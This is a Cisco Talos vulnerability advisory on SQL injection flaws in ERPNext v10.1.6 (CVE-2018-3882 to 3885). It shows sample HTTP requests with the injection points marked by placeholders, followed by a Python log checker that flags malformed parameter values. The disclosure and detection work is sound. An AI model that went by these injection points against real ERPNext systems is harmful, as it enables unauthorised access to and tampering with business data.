Headline
CVE-2018-3882: TALOS-2018-0560 || Cisco Talos Intelligence Group
An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. The searchfield parameter can be used to perform an SQL injection attack. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
Summary
Exploitable SQL injection vulnerabilities exist in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
Tested Versions
ERPNext v10.1.6 (master)
Product URLs
https://erpnext.com/
CVSSv3 Score
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
CWE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
Details
The following parameters are vulnerable to SQL injection attacks:
CVE-2018-3882 - searchfield parameter
The searchfield parameter can be used to perform an SQL injection attack as shown below:
GET /?txt=a&searchfield=name<SQLINJECTION>&query=erpnext.controllers.queries.employee_query&doctype=Employee&cmd=frappe.desk.search.search_widget&_=1522110063950 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close
CVE-2018-3883 - employee parameter
The employee parameter can be used to perform an SQL injection attack as shown below:
POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 194
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close
employee=EMP%2f0001<SQLINJECTION>&date=2018-03-07&leave_type=Leave+Without+Pay&consider_all_leaves_in_the_allocation_period=true&cmd=erpnext.hr.doctype.leave_application.leave_application.get_leave_balance_on
CVE-2018-3883 - sort_order parameter
The sort_order parameter can be used to perform an SQL injection attack as shown below:
POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
item_code=asdasd&start=0&sort_by=projected_qty&sort_order=asc<SQLINJECTION>&cmd=erpnext.stock.dashboard.item_dashboard.get_data
CVE-2018-3884 - sort_by parameter
The sort_by parameter can be used to perform an SQL injection attack as shown below:
POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
item_code=asdasd&start=0&sort_by=projected_qty<SQLINJECTION>&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data
CVE-2018-3884 - start parameter
The start parameter can be used to perform an SQL injection attack as shown below:
POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
item_code=asdasd&start=0<SQLINJECTION>&sort_by=projected_qty&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data
CVE-2018-3885 - order_by parameter
The order_by parameter can be used to perform an SQL injection attack as shown below:
GET /?start=0&page_length=20&doctype=Customer&fields=[%22%60tabCustomer%60.%60name%60%22%2c%22%60tabCustomer%60.%60owner%60%22%2c%22%60tabCustomer%60.%60docstatus%60%22%2c%22%60tabCustomer%60.%60_user_tags%60%22%2c%22%60tabCustomer%60.%60_comments%60%22%2c%22%60tabCustomer%60.%60modified%60%22%2c%22%60tabCustomer%60.%60modified_by%60%22%2c%22%60tabCustomer%60.%60_assign%60%22%2c%22%60tabCustomer%60.%60_liked_by%60%22%2c%22%60tabCustomer%60.%60_seen%60%22%2c%22%60tabCustomer%60.%60customer_name%60%22%2c%22%60tabCustomer%60.%60image%60%22%2c%22%60tabCustomer%60.%60disabled%60%22%2c%22%60tabCustomer%60.%60customer_group%60%22%2c%22%60tabCustomer%60.%60territory%60%22%2c%22%60tabCustomer%60.%60customer_type%60%22]&filters=%5B%5D&order_by=<SQLINJECTION>&with_comment_count=true&user_settings=%7B%22updated_on%22%3A%22Tue+Mar+27+2018+01%3A08%3A06+GMT%2B0100%22%2C%22List%22%3A%7B%22filters%22%3A%5B%5D%2C%22order_by%22%3A%22%60tabCustomer%60.%60modified%60+desc%22%7D%2C%22last_view%22%3A%22List%22%7D&cmd=frappe.desk.reportview.get&_=1522108874124 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
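As an added example, not part of the advisory or of the ERPNext code base: a request-log check that flags values of the parameters named above (searchfield, employee, sort_by, sort_order, start, order_by) which do not match the shape a legitimate ERPNext client sends to the corresponding cmd handler. The expected shapes and the sample requests are assumptions of this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Expected shape of each parameter the advisory names, keyed by the Frappe
# `cmd` handler that consumes it. The shapes are this example's assumptions
# about what legitimate ERPNext clients send; the advisory does not state them.
IDENT = re.compile(r"^[A-Za-z_]\w*$")
EXPECTED = {
    "frappe.desk.search.search_widget": {"searchfield": IDENT},
    "erpnext.hr.doctype.leave_application.leave_application.get_leave_balance_on": {
        "employee": re.compile(r"^[A-Za-z0-9/_-]+$")},
    "erpnext.stock.dashboard.item_dashboard.get_data": {
        "sort_by": IDENT,
        "sort_order": re.compile(r"^(asc|desc)$", re.I),
        "start": re.compile(r"^\d+$")},
    "frappe.desk.reportview.get": {
        # e.g. `tabCustomer`.`modified` desc, or empty
        "order_by": re.compile(r"^(`tab[A-Za-z ]+`\.`[A-Za-z_]\w*`( (asc|desc))?)?$", re.I)},
}

def request_params(method, target, body=""):
    """Decode the query string (GET) or form body (POST) into {name: first value}."""
    raw = urlsplit(target).query if method == "GET" else body
    return {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}

def suspicious(method, target, body=""):
    """Return [(param, decoded value)] for every parameter that violates its shape.

    Requests whose cmd is not one of the advisory's handlers yield an empty list.
    """
    params = request_params(method, target, body)
    rules = EXPECTED.get(params.get("cmd", ""), {})
    return [(name, params[name]) for name, rx in rules.items()
            if name in params and not rx.match(params[name])]

if __name__ == "__main__":
    # Constructed sample requests, not traffic from the advisory.
    samples = [
        ("GET", "/?txt=a&searchfield=name&cmd=frappe.desk.search.search_widget", ""),
        ("POST", "/", "item_code=x&start=0&sort_by=projected_qty&sort_order=asc%27"
                      "&cmd=erpnext.stock.dashboard.item_dashboard.get_data"),
    ]
    for method, target, body in samples:
        print(method, target, body, "->", suspicious(method, target, body) or "clean")
```

A value that fails its shape is only a trigger for review; the check decodes percent-encoding first so that an encoded quote is judged the same way as a literal one.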
Timeline
2018-04-12 - Vendor Disclosure
2018-09-05 - Public Release